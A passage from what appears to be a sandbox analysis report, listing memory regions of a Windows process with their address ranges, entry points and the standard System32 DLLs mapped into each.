(normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 2907 start_va = 0x7ff84c340000 end_va = 0x7ff84c415fff monitored = 0 entry_point = 0x7ff84c36a800 region_type = mapped_file name = "wmiprvsd.dll" filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll") Region: id = 2908 start_va = 0x7ff84c870000 end_va = 0x7ff84c8b3fff monitored = 0 entry_point = 0x7ff84c87c010 region_type = mapped_file name = "execmodelclient.dll" filename = "\\Windows\\System32\\ExecModelClient.dll" (normalized: "c:\\windows\\system32\\execmodelclient.dll") Region: id = 2909 start_va = 0x7ff84cd80000 end_va = 0x7ff84cdaefff monitored = 0 entry_point = 0x7ff84cd8ec60 region_type = mapped_file name = "cryptnet.dll" filename = "\\Windows\\System32\\cryptnet.dll" (normalized: "c:\\windows\\system32\\cryptnet.dll") Region: id = 2910 start_va = 0x7ff84cde0000 end_va = 0x7ff84cdf3fff monitored = 0 entry_point = 0x7ff84cde3710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 2911 start_va = 0x7ff84ce00000 end_va = 0x7ff84ce27fff monitored = 0 entry_point = 0x7ff84ce0efc0 region_type = mapped_file name = "dssenh.dll" filename = "\\Windows\\System32\\dssenh.dll" (normalized: "c:\\windows\\system32\\dssenh.dll") Region: id = 2912 start_va = 0x7ff84ce30000 end_va = 0x7ff84ce84fff monitored = 0 entry_point = 0x7ff84ce4f870 region_type = mapped_file name = "ncryptprov.dll" filename = "\\Windows\\System32\\ncryptprov.dll" (normalized: "c:\\windows\\system32\\ncryptprov.dll") Region: id = 2913 start_va = 0x7ff84ce90000 end_va = 0x7ff84ceadfff monitored = 0 entry_point = 0x7ff84ce9ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 2914 start_va = 0x7ff84cf20000 end_va = 0x7ff84cf3afff monitored = 0 entry_point = 0x7ff84cf21040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 2915 start_va = 0x7ff84d1d0000 end_va = 0x7ff84d24ffff monitored = 0 entry_point = 0x7ff84d1fd280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 2916 start_va = 0x7ff84d320000 end_va = 0x7ff84d35efff monitored = 0 entry_point = 0x7ff84d3482d0 region_type = mapped_file name = "tcpipcfg.dll" filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll") Region: id = 2917 start_va = 0x7ff84d360000 end_va = 0x7ff84d370fff monitored = 0 entry_point = 0x7ff84d3628d0 region_type = mapped_file name = "credentialmigrationhandler.dll" filename = "\\Windows\\System32\\CredentialMigrationHandler.dll" (normalized: "c:\\windows\\system32\\credentialmigrationhandler.dll") Region: id = 2918 start_va = 0x7ff84d6d0000 end_va = 0x7ff84d76afff monitored = 0 entry_point = 0x7ff84d6d7220 region_type = mapped_file name = "settingsync.dll" filename = "\\Windows\\System32\\SettingSync.dll" (normalized: "c:\\windows\\system32\\settingsync.dll") Region: id = 2919 start_va = 0x7ff84d770000 end_va = 0x7ff84d7d3fff monitored = 0 entry_point = 0x7ff84d78bed0 region_type = mapped_file name = "repdrvfs.dll" filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll") Region: id = 2920 start_va = 0x7ff84d7e0000 end_va = 0x7ff84d804fff monitored = 0 entry_point = 0x7ff84d7e9900 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 2921 start_va = 0x7ff84d810000 end_va = 0x7ff84d823fff monitored = 0 entry_point = 0x7ff84d811800 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 2922 start_va = 0x7ff84d830000 end_va = 0x7ff84d925fff monitored = 0 entry_point = 0x7ff84d869590 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 2923 start_va = 0x7ff84d930000 end_va = 0x7ff84d9a3fff monitored = 0 entry_point = 0x7ff84d945eb0 region_type = mapped_file name = "esscli.dll" filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll") Region: id = 2924 start_va = 0x7ff84d9b0000 end_va = 0x7ff84dae6fff monitored = 0 entry_point = 0x7ff84d9f0480 region_type = mapped_file name = "wbemcore.dll" filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll") Region: id = 2925 start_va = 0x7ff84daf0000 end_va = 0x7ff84db00fff monitored = 0 entry_point = 0x7ff84daf2fc0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 2926 start_va = 0x7ff84db10000 end_va = 0x7ff84db2dfff monitored = 0 entry_point = 0x7ff84db13a40 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 2927 start_va = 0x7ff84db30000 end_va = 0x7ff84dbb1fff monitored = 0 entry_point = 0x7ff84db32a10 region_type = mapped_file name = "hnetcfg.dll" filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll") Region: id = 2928 start_va = 0x7ff84dbc0000 end_va = 0x7ff84dbd5fff monitored = 0 entry_point = 0x7ff84dbc1af0 region_type = mapped_file name = "napinsp.dll" filename = "\\Windows\\System32\\NapiNSP.dll" (normalized: "c:\\windows\\system32\\napinsp.dll") Region: id = 2929 start_va = 0x7ff84dbe0000 end_va = 0x7ff84dbeefff monitored = 0 entry_point = 0x7ff84dbe4960 region_type = mapped_file name = "nci.dll" filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll") Region: id = 2930 start_va = 0x7ff84dbf0000 end_va = 0x7ff84dee8fff monitored = 0 entry_point = 0x7ff84dcb7280 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 2931 start_va = 0x7ff84df80000 end_va = 0x7ff84df99fff monitored = 0 entry_point = 0x7ff84df82330 region_type = mapped_file name = "pnrpnsp.dll" filename = "\\Windows\\System32\\pnrpnsp.dll" (normalized: "c:\\windows\\system32\\pnrpnsp.dll") Region: id = 2932 start_va = 0x7ff84dff0000 end_va = 0x7ff84dffcfff monitored = 0 entry_point = 0x7ff84dff1420 region_type = mapped_file name = "winrnr.dll" filename = "\\Windows\\System32\\winrnr.dll" (normalized: "c:\\windows\\system32\\winrnr.dll") Region: id = 2933 start_va = 0x7ff84e190000 end_va = 0x7ff84e19ffff monitored = 0 entry_point = 0x7ff84e191690 region_type = mapped_file name = "wups.dll" filename = "\\Windows\\System32\\wups.dll" (normalized: "c:\\windows\\system32\\wups.dll") Region: id = 2934 start_va = 0x7ff84ee30000 end_va = 0x7ff84ee41fff monitored = 0 entry_point = 0x7ff84ee33580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 2935 start_va = 0x7ff84ee50000 end_va = 0x7ff84eee3fff monitored = 0 entry_point = 0x7ff84ee89210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 2936 start_va = 0x7ff84eef0000 end_va = 0x7ff84f192fff monitored = 0 entry_point = 0x7ff84ef16190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 2937 start_va = 0x7ff84f1a0000 end_va = 0x7ff84f1b1fff monitored = 0 entry_point = 0x7ff84f1a1a80 region_type = mapped_file name = "bitsproxy.dll" filename = "\\Windows\\System32\\BitsProxy.dll" (normalized: "c:\\windows\\system32\\bitsproxy.dll") Region: id = 2938 start_va = 0x7ff84f1f0000 end_va = 0x7ff84f22ffff monitored = 0 entry_point = 0x7ff84f1fcbe0 region_type = mapped_file name = "adsldpc.dll" filename = "\\Windows\\System32\\adsldpc.dll" (normalized: "c:\\windows\\system32\\adsldpc.dll") Region: id = 2939 start_va = 0x7ff84f230000 end_va = 0x7ff84f276fff monitored = 0 entry_point = 0x7ff84f231d10 region_type = mapped_file name = "activeds.dll" filename = "\\Windows\\System32\\activeds.dll" (normalized: "c:\\windows\\system32\\activeds.dll") Region: id = 2940 start_va = 0x7ff84f390000 end_va = 0x7ff84f3d1fff monitored = 0 entry_point = 0x7ff84f393670 region_type = mapped_file name = "wdscore.dll" filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll") Region: id = 2941 start_va = 0x7ff84f880000 end_va = 0x7ff84f89efff monitored = 0 entry_point = 0x7ff84f8837e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 2942 start_va = 0x7ff84f8a0000 end_va = 0x7ff84f918fff monitored = 0 entry_point = 0x7ff84f8a76a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 2943 start_va = 0x7ff84f920000 end_va = 0x7ff84f938fff monitored = 0 entry_point = 0x7ff84f924520 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 2944 start_va = 0x7ff84f940000 end_va = 0x7ff84f97ffff monitored = 0 entry_point = 0x7ff84f956c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 2945 start_va = 0x7ff84f980000 end_va = 0x7ff84f997fff monitored = 0 entry_point = 0x7ff84f982000 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 2946 start_va = 0x7ff84f9a0000 end_va = 0x7ff84fb21fff monitored = 0 entry_point = 0x7ff84f9b82a0 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 2947 start_va = 0x7ff84fb30000 end_va = 0x7ff84fb47fff monitored = 0 entry_point = 0x7ff84fb34e10 region_type = mapped_file name = "adhsvc.dll" filename = "\\Windows\\System32\\adhsvc.dll" (normalized: "c:\\windows\\system32\\adhsvc.dll") Region: id = 2948 start_va = 0x7ff84fb50000 end_va = 0x7ff84fb74fff monitored = 0 entry_point = 0x7ff84fb55ca0 region_type = mapped_file name = "httpprxm.dll" filename = "\\Windows\\System32\\httpprxm.dll" (normalized: "c:\\windows\\system32\\httpprxm.dll") Region: id = 2949 start_va = 0x7ff84fb80000 end_va = 0x7ff84fc22fff monitored = 0 entry_point = 0x7ff84fb82c10 region_type = mapped_file name = "clusapi.dll" filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll") Region: id = 2950 start_va = 0x7ff84fc30000 end_va = 0x7ff84fc81fff monitored = 0 entry_point = 0x7ff84fc35770 region_type = mapped_file name = "resutils.dll" filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll") Region: id = 2951 start_va = 0x7ff84fc90000 end_va = 0x7ff84fcbdfff monitored = 1 entry_point = 0x7ff84fc92300 region_type = mapped_file name = "wmidcom.dll" filename = "\\Windows\\System32\\wmidcom.dll" (normalized: "c:\\windows\\system32\\wmidcom.dll") Region: id = 2952 start_va = 0x7ff84fcc0000 end_va = 0x7ff84fd1dfff monitored = 0 entry_point = 0x7ff84fcc5080 region_type = mapped_file name = "miutils.dll" filename = "\\Windows\\System32\\miutils.dll" (normalized: "c:\\windows\\system32\\miutils.dll") Region: id = 2953 start_va = 0x7ff84fd20000 end_va = 0x7ff84fd3ffff monitored = 0 entry_point = 0x7ff84fd21f50 region_type = mapped_file name = "mi.dll" filename = "\\Windows\\System32\\mi.dll" (normalized: "c:\\windows\\system32\\mi.dll") Region: id = 2954 start_va = 0x7ff84fd40000 end_va = 0x7ff84fd48fff monitored = 0 entry_point = 0x7ff84fd418f0 region_type = mapped_file name = "sscoreext.dll" filename = "\\Windows\\System32\\sscoreext.dll" (normalized: "c:\\windows\\system32\\sscoreext.dll") Region: id = 2955 start_va = 0x7ff84fd50000 end_va = 0x7ff84fd60fff monitored = 0 entry_point = 0x7ff84fd51d30 region_type = mapped_file name = "sscore.dll" filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll") Region: id = 2956 start_va = 0x7ff84fdb0000 end_va = 0x7ff84fdf0fff monitored = 0 entry_point = 0x7ff84fdb3750 region_type = mapped_file name = "sqmapi.dll" filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll") Region: id = 2957 start_va = 0x7ff84fe00000 end_va = 0x7ff84fe13fff monitored = 0 entry_point = 0x7ff84fe02d50 region_type = mapped_file name = "rtutils.dll" filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll") Region: id = 2958 start_va = 0x7ff84fe20000 end_va = 0x7ff84ff12fff monitored = 0 entry_point = 0x7ff84fe45d80 region_type = mapped_file name = "iphlpsvc.dll" filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll") Region: id = 2959 start_va = 0x7ff84ffd0000 end_va = 0x7ff85001bfff monitored = 0 entry_point = 0x7ff84ffe5310 region_type = mapped_file name = "srvsvc.dll" filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll") Region: id = 2960 start_va = 0x7ff850160000 end_va = 0x7ff8501defff monitored = 0 entry_point = 0x7ff850177110 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 2961 start_va = 0x7ff8501e0000 end_va = 0x7ff85021bfff monitored = 0 entry_point = 0x7ff8501e6aa0 region_type = mapped_file name = "wmisvc.dll" filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll") Region: id = 2962 start_va = 0x7ff8502c0000 end_va = 0x7ff8502cbfff monitored = 0 entry_point = 0x7ff8502c35c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 2963 start_va = 0x7ff8502e0000 end_va = 0x7ff850619fff monitored = 0 entry_point = 0x7ff8502e8520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 2964 start_va = 0x7ff851c10000 end_va = 0x7ff851c18fff monitored = 0 entry_point = 0x7ff851c121d0 region_type = mapped_file name = "httpprxc.dll" filename = "\\Windows\\System32\\httpprxc.dll" (normalized: "c:\\windows\\system32\\httpprxc.dll") Region: id = 2965 start_va = 0x7ff851c20000 end_va = 0x7ff851c54fff monitored = 0 entry_point = 0x7ff851c2a270 region_type = mapped_file name = "fwpolicyiomgr.dll" filename = "\\Windows\\System32\\fwpolicyiomgr.dll" (normalized: "c:\\windows\\system32\\fwpolicyiomgr.dll") Region: id = 2966 start_va = 0x7ff851d40000 end_va = 0x7ff851d49fff monitored = 0 entry_point = 0x7ff851d414c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 2967 start_va = 0x7ff852020000 end_va = 0x7ff852034fff monitored = 0 entry_point = 0x7ff852022dc0 region_type = mapped_file name = "ondemandconnroutehelper.dll" filename = "\\Windows\\System32\\OnDemandConnRouteHelper.dll" (normalized: "c:\\windows\\system32\\ondemandconnroutehelper.dll") Region: id = 2968 start_va = 0x7ff8521a0000 end_va = 0x7ff852232fff monitored = 0 entry_point = 0x7ff8521a9680 region_type = mapped_file name = "msvcp_win.dll" filename = "\\Windows\\System32\\msvcp_win.dll" (normalized: "c:\\windows\\system32\\msvcp_win.dll") Region: id = 2969 start_va = 0x7ff852400000 end_va = 0x7ff85240ffff monitored = 0 entry_point = 0x7ff852401700 region_type = mapped_file name = "proximityservicepal.dll" filename = "\\Windows\\System32\\ProximityServicePal.dll" (normalized: "c:\\windows\\system32\\proximityservicepal.dll") Region: id = 2970 start_va = 0x7ff852410000 end_va = 0x7ff852418fff monitored = 0 entry_point = 0x7ff852411ed0 region_type = mapped_file name = "proximitycommonpal.dll" filename = "\\Windows\\System32\\ProximityCommonPal.dll" (normalized: "c:\\windows\\system32\\proximitycommonpal.dll") Region: id = 2971 start_va = 0x7ff852420000 end_va = 0x7ff85244cfff monitored = 0 entry_point = 0x7ff852422290 region_type = mapped_file name = "proximitycommon.dll" filename = "\\Windows\\System32\\ProximityCommon.dll" (normalized: "c:\\windows\\system32\\proximitycommon.dll") Region: id = 2972 start_va = 0x7ff852450000 end_va = 0x7ff8524a1fff monitored = 0 entry_point = 0x7ff8524538e0 region_type = mapped_file name = "proximityservice.dll" filename = "\\Windows\\System32\\ProximityService.dll" (normalized: "c:\\windows\\system32\\proximityservice.dll") Region: id = 2973 start_va = 0x7ff8524b0000 end_va = 0x7ff8524bdfff monitored = 0 entry_point = 0x7ff8524b1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 2974 start_va = 0x7ff8524c0000 end_va = 0x7ff85257ffff monitored = 0 entry_point = 0x7ff8524efd20 region_type = mapped_file name = "fveapi.dll" filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll") Region: id = 2975 start_va = 0x7ff852610000 end_va = 0x7ff852624fff monitored = 0 entry_point = 0x7ff852613460 region_type = mapped_file name = "ssdpapi.dll" filename = "\\Windows\\System32\\ssdpapi.dll" (normalized: "c:\\windows\\system32\\ssdpapi.dll") Region: id = 2976 start_va = 0x7ff852630000 end_va = 0x7ff8526c9fff monitored = 0 entry_point = 0x7ff85264ada0 region_type = mapped_file name = "shsvcs.dll" filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll") Region: id = 2977 start_va = 0x7ff8527b0000 end_va = 0x7ff852816fff monitored = 0 entry_point = 0x7ff8527b63e0 region_type = mapped_file name = "fwpuclnt.dll" filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll") Region: id = 2978 start_va = 0x7ff852880000 end_va = 0x7ff85288afff monitored = 0 entry_point = 0x7ff852881d30 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 2979 start_va = 0x7ff852890000 end_va = 0x7ff8528a9fff monitored = 0 entry_point = 0x7ff852892430 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll") Region: id = 2980 start_va = 0x7ff8528b0000 end_va = 0x7ff8528c5fff monitored = 0 entry_point = 0x7ff8528b19f0 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll") Region: id = 2981 start_va = 0x7ff852960000 end_va = 0x7ff852997fff monitored = 0 entry_point = 0x7ff852978cc0 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 2982 start_va = 0x7ff852c70000 end_va = 0x7ff852c81fff monitored = 0 entry_point = 0x7ff852c79260 region_type = mapped_file name = "rilproxy.dll" filename = "\\Windows\\System32\\rilproxy.dll" (normalized: "c:\\windows\\system32\\rilproxy.dll") Region: id = 2983 start_va = 0x7ff852c90000 end_va = 0x7ff852d40fff monitored = 0 entry_point = 0x7ff852d088b0 region_type = mapped_file name = "cellularapi.dll" filename = "\\Windows\\System32\\CellularAPI.dll" (normalized: "c:\\windows\\system32\\cellularapi.dll") Region: id = 2984 start_va = 0x7ff852d50000 end_va = 0x7ff852d74fff monitored = 0 entry_point = 0x7ff852d62f20 region_type = mapped_file name = "wificonnapi.dll" filename = "\\Windows\\System32\\wificonnapi.dll" (normalized: "c:\\windows\\system32\\wificonnapi.dll") Region: id = 2985 start_va = 0x7ff852d80000 end_va = 0x7ff852d90fff monitored = 0 entry_point = 0x7ff852d87ea0 region_type = mapped_file name = "dcpapi.dll" filename = "\\Windows\\System32\\dcpapi.dll" (normalized: "c:\\windows\\system32\\dcpapi.dll") Region: id = 2986 start_va = 0x7ff852da0000 end_va = 0x7ff852db9fff monitored = 0 entry_point = 0x7ff852da2cf0 region_type = mapped_file name = "locationpelegacywinlocation.dll" filename = "\\Windows\\System32\\LocationPeLegacyWinLocation.dll" (normalized: "c:\\windows\\system32\\locationpelegacywinlocation.dll") Region: id = 2987 start_va = 0x7ff852dc0000 end_va = 0x7ff852e14fff monitored = 0 entry_point = 0x7ff852dc3fb0 region_type = mapped_file name = "policymanager.dll" filename = "\\Windows\\System32\\policymanager.dll" (normalized: "c:\\windows\\system32\\policymanager.dll") Region: id = 2988 start_va = 0x7ff852e20000 end_va = 0x7ff852e56fff monitored = 0 entry_point = 0x7ff852e26020 region_type = mapped_file name = "gnssadapter.dll" filename = "\\Windows\\System32\\GnssAdapter.dll" (normalized: "c:\\windows\\system32\\gnssadapter.dll") Region: id = 2989 start_va = 0x7ff852e60000 end_va = 0x7ff852e7ffff monitored = 0 entry_point = 0x7ff852e639a0 region_type = mapped_file name = "locationwinpalmisc.dll" filename = "\\Windows\\System32\\LocationWinPalMisc.dll" (normalized: "c:\\windows\\system32\\locationwinpalmisc.dll") Region: id = 2990 start_va = 0x7ff852e80000 end_va = 0x7ff852ec0fff monitored = 0 entry_point = 0x7ff852e84840 region_type = mapped_file name = "usermgrproxy.dll" filename = "\\Windows\\System32\\UserMgrProxy.dll" (normalized: "c:\\windows\\system32\\usermgrproxy.dll") Region: id = 2991 start_va = 0x7ff853170000 end_va = 0x7ff853186fff monitored = 0 entry_point = 0x7ff853175630 region_type = mapped_file name = "sens.dll" filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll") Region: id = 2992 start_va = 0x7ff853260000 end_va = 0x7ff85328dfff monitored = 0 entry_point = 0x7ff853267550 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 2993 start_va = 0x7ff8532b0000 end_va = 0x7ff8532bbfff monitored = 0 entry_point = 0x7ff8532b2830 region_type = mapped_file name = "bi.dll" filename = "\\Windows\\System32\\bi.dll" (normalized: "c:\\windows\\system32\\bi.dll") Region: id = 2994 start_va = 0x7ff853740000 end_va = 0x7ff853752fff monitored = 0 entry_point = 0x7ff8537457f0 region_type = mapped_file name = "themeservice.dll" filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll") Region: id = 2995 start_va = 0x7ff853760000 end_va = 0x7ff8537d9fff monitored = 0 entry_point = 0x7ff853787630 region_type = mapped_file name = "es.dll" filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll") Region: id = 2996 start_va = 0x7ff8537e0000 end_va = 0x7ff8537f5fff monitored = 0 entry_point = 0x7ff8537e1b60 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 2997 start_va = 0x7ff8539c0000 end_va = 0x7ff853d41fff monitored = 0 entry_point = 0x7ff853a11220 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 2998 start_va = 0x7ff854d90000 end_va = 0x7ff854e38fff monitored = 0 entry_point = 0x7ff854db9010 region_type = mapped_file name = "windows.ui.dll" filename = "\\Windows\\System32\\Windows.UI.dll" (normalized: "c:\\windows\\system32\\windows.ui.dll") Region: id = 2999 start_va = 0x7ff854e40000 end_va = 0x7ff854f4dfff monitored = 0 entry_point = 0x7ff854e8eaa0 region_type = mapped_file name = "mrmcorer.dll" filename = "\\Windows\\System32\\MrmCoreR.dll" (normalized: "c:\\windows\\system32\\mrmcorer.dll") Region: id = 3000 start_va = 0x7ff855250000 end_va = 0x7ff855385fff monitored = 0 entry_point = 0x7ff85527f350 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 3001 start_va = 0x7ff855390000 end_va = 0x7ff855475fff monitored = 0 entry_point = 0x7ff8553acf10 region_type = mapped_file name = "usermgr.dll" filename = "\\Windows\\System32\\usermgr.dll" (normalized: "c:\\windows\\system32\\usermgr.dll") Region: id = 3002 start_va = 0x7ff855480000 end_va = 0x7ff8554e3fff monitored = 0 entry_point = 0x7ff855495ae0 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 3003 start_va = 0x7ff8556c0000 end_va = 0x7ff855787fff monitored = 0 entry_point = 0x7ff8557013f0 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 3004 start_va = 0x7ff855790000 end_va = 0x7ff8557f0fff monitored = 0 entry_point = 0x7ff855794b50 region_type = mapped_file name = "wlanapi.dll" filename = "\\Windows\\System32\\wlanapi.dll" (normalized: "c:\\windows\\system32\\wlanapi.dll") Region: id = 3005 start_va = 0x7ff855800000 end_va = 0x7ff85597bfff monitored = 0 entry_point = 0x7ff855851650 region_type = mapped_file name = "locationframework.dll" filename = "\\Windows\\System32\\LocationFramework.dll" (normalized: "c:\\windows\\system32\\locationframework.dll") Region: id = 3006 start_va = 0x7ff855980000 end_va = 0x7ff85598afff monitored = 0 entry_point = 0x7ff855981770 region_type = mapped_file name = "lfsvc.dll" filename = "\\Windows\\System32\\lfsvc.dll" (normalized: "c:\\windows\\system32\\lfsvc.dll") Region: id = 3007 start_va = 0x7ff855990000 end_va = 0x7ff8559cdfff monitored = 0 entry_point = 0x7ff85599a050 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 3008 start_va = 0x7ff8559d0000 end_va = 0x7ff8559f6fff monitored = 0 entry_point = 0x7ff8559d3bf0 region_type = mapped_file name = "profsvcext.dll" filename = "\\Windows\\System32\\profsvcext.dll" (normalized: "c:\\windows\\system32\\profsvcext.dll") Region: id = 3009 start_va = 0x7ff855a00000 end_va = 0x7ff855a0cfff monitored = 0 entry_point = 0x7ff855a02ca0 region_type = mapped_file name = "csystemeventsbrokerclient.dll" filename = "\\Windows\\System32\\CSystemEventsBrokerClient.dll" (normalized: "c:\\windows\\system32\\csystemeventsbrokerclient.dll") Region: id = 3010 start_va = 0x7ff855a10000 end_va = 0x7ff855a3efff monitored = 0 entry_point = 0x7ff855a18910 region_type = mapped_file name = "wptaskscheduler.dll" filename = "\\Windows\\System32\\WPTaskScheduler.dll" (normalized: "c:\\windows\\system32\\wptaskscheduler.dll") Region: id = 3011 start_va = 0x7ff855a40000 end_va = 0x7ff855a94fff monitored = 0 entry_point = 0x7ff855a4fc00 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 3012 start_va = 0x7ff855aa0000 end_va = 0x7ff855ab3fff monitored = 0 entry_point = 0x7ff855aa2a00 region_type = mapped_file name = "bitsigd.dll" filename = "\\Windows\\System32\\bitsigd.dll" (normalized: "c:\\windows\\system32\\bitsigd.dll") Region: id = 3013 start_va = 0x7ff855ac0000 end_va = 0x7ff855adefff monitored = 0 entry_point = 0x7ff855ac4960 region_type = mapped_file name = "ncprov.dll" filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll") Region: id = 3014 start_va = 0x7ff855ae0000 end_va = 0x7ff855aeafff monitored = 0 entry_point = 0x7ff855ae1de0 region_type = mapped_file name = "bitsperf.dll" filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll") Region: id = 3015 start_va = 0x7ff855af0000 end_va = 0x7ff855b39fff monitored = 0 entry_point = 0x7ff855afac30 region_type = mapped_file name = "deviceaccess.dll" filename = 